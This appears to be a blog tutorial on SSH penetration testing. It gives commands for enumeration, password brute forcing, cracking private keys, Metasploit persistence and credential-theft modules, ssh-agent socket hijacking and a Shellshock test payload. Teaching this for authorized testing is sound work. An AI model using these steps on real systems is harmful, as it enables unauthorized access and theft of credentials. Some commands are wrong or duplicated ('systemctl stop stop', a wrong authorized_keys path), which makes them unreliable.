SSH Penetration Testing Fundamentals
Posted in: Network Penetration Testing

SSH Penetration Testing Fundamentals

Welcome, today I am writing about SSH Penetration Testing fundamentals describing port 22 vulnerabilities. SSH security is one of the topics we all need to understand, remote access services can be an entry point for malicious actors when configured improperly.

Understand SSH Protocol

Understanding how SSH works are out of scope, here I assume you already are familiar with the service and how can be configured on a Linux host.

Some things to remember, SSH works on port 22 by default and uses a client-server architecture, which is used to access remote hosts securely.

SSH can implement different types of authentication each one of them has its security vulnerabilities, keep that in mind! One of the most used methods to authenticate is the use of RSA Keys using the PKI infrastructure. Another great feature is the possibility to create encrypted tunnels between machines or implement port forwarding on local or remote services, or Us as pentesters we can use it to pivot inside the network under the radar since SSH is a well-known tool by sysadmins.

Read more about Pivoting using SSH

Managing SSH Service

Verify SSH Server Status

systemctl status ssh

Start SSH Service

systemctl start ssh

Stop SSH Service

systemctl stop stop

Restart SSH Service

systemctl restart stop

Define SSH server to start on boot

systemctl enable ssh

SSH Interesting Files

SSH has some files that need to be checked, all of them have something we can leverage to escalate our attack or help us move around

Client Config

SSH client configuration file can be used to automate configurations or jump between machines, take some time and check the file:

vi /etc/ssh/ssh_config

Server Config

SSH Server configuration is stored on the next file, after compromising the machine you can control how the server works.

vi /etc/ssh/sshd_config

Recommendation: Active tunnel settings and agent relay, help you with lateral movement.

Authorized Keys

The authorized_keys file is responsible to maintain the SSH keys authorized to authenticate in the machine. Each user can have his own file.

vi /etc/ssh/authorized_keys

Know Hosts

cat /home/rfs/.ssh/known_hosts

RSA Keys

Default folder containing

cd ~/.ssh
cd /home/rfs/.ssh

Attack SSH port 22

SSH Penetration Testing

Ok let’s talk about how to pentest SSH, as you know its all start with enumeration we can use some tools to do all the work for us or we can do it manually.

Some questions to ask before starting enumerating

  • Is there any SSH server running?
  • On what Port?
  • What version is running?
  • Any Exploit to that version?
  • What authentication type is used? Passwords / RSA Keys
  • It is blocking brute force?

After we have all the answers we can start thinking about what to do, if don’t have any information about users or passwords/keys yet is better to search for an exploit unfortunately SSH exploits are rare, search my website if there are any exploits.

Damn it, we are stuck :/

It’s time to go enumerate other services and try to find something that can be used like usernames or RSA Keys, remember keys usually have the username at the bottom.

Assuming we found one or more usernames we can try to brute force the service using a good wordlist or if we were lucky and have found an RSA Key with a username, We Are In!

Haha is not so easy, but OK, we are learning…

SSH Enumeration

After we scan a network and identify port 22 open on a remote host we need to identify what SSH service is running and what version and for that, we can use Nmap.

nmap -sV -p22 192.168.1.96

SSH Banner Grabber

Banner grabbing is an easy technique to do but can help us a lot, we can verify what service version is running on the remote server and try to find a CVE related to it.

nc 192.168.1.96 22
SSH Banner

If we try to connect using the verbose parameter we can check all information necessary to authenticate on the remote server.

ssh -v 192.168.1.96
SSH Servers ListWebsite
Dropbear Server
OpenSSH Server
wolfSSH Server
CopSSH Server
Cisco SSH Server
IBM SSH

Detect SSH Authentication Type

ssh -v 192.168.1.96
SSH authentication types

Attack SSH port 22

At this point, we only know what service running on port 22 and what version it has (OpenSSH_4.7p1 Debian-8ubuntu1), assuming we have found the username msfadmin we will try to brute-force his password using hydra.

Bruteforce SSH Service

hydra -l msfadmin -P rockyou.txt ssh://192.168.1.96
crackmapexec ssh -U user -P passwd.lst 192.168.1.96
use auxiliary/scanner/ssh/ssh_login
set rhosts 192.168.1.96
set user_file user.txt
set pass_file password.txt
run

Crack SSH Private Keys

ssh2john id_rsa.priv hash.txt
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

https://github.com/openwall/john/blob/bleeding-jumbo/run/ssh2john.py

Default Credentials

https://github.com/PopLabSec/SSH-default-Credentials

SSH Bad Keys

Some embedded devices have static SSH keys, you can find a collection of keys here:

https://github.com/poplabdev/ssh-badkeys

SSH Exploits

VersionExploit
OpenSSH <7.4
SSH Exploits

LibSSH RCE

CVE-2018-10933

Post Exploitation

Persistence

use post/linux/manage/sshkey_persistence
msf post(sshkey_persistence) > set session 1
msf post(sshkey_persistence) >exploit

SSH User Code Execution

msf > use exploit/multi/ssh/sshexec
msf exploit(sshexec) >set rhosts 192.168.1.103
msf exploit(sshexec) >set username rfs
msf exploit(sshexec) >set password poplabsec
msf exploit(sshexec) >set srvhost 192.168.1.107
msf exploit(sshexec) >exploit

Lateral Movement

Steal SSH credentials

If we have a meterpreter shell we can use the post-exploitation module post/multi/gather/ssh_creds and try to collect all SSH credentials on the machine.

use post/multi/gather/ssh_creds
msf post(ssh_creds) >set session 1
msf post(ssh_creds) >exploit

Search SSH Keys files

find / -name *id_rsa* 2>/dev/null

Search SSH Key files inside file content

find / -name *id_rsa* 2>/dev/null

SSH Hijacking

Find the SSHd process

ps uax|grep sshd
# Attacker looks for the SSH_AUTH_SOCK on victim's environment variables
grep SSH_AUTH_SOCK /proc/<pid>/environ

Attacker hijack’s victim’s ssh-agent socket

SSH_AUTH_SOCK=/tmp/ssh-XXXXXXXXX/agent.XXXX ssh-add -l

An attacker can log in to remote systems as the victim

ssh 192.168.1.107 -l victim

SSH and ShellShock

LC_X='() { :; }; echo vulnerable' ssh rfs@poplabsec.com -o SendEnv=LC_X

SSH Tunnels

Working with RSA Keys

SSH Hacking Tools

sshaudit

SSH-KeyGrab

CrackMapExec

Is port 22 secure?

Yes, is one of the most secure services.

Should port 22 be open?

Port 22 only should be open if you need to access your machine remotely.

Back to Top
Index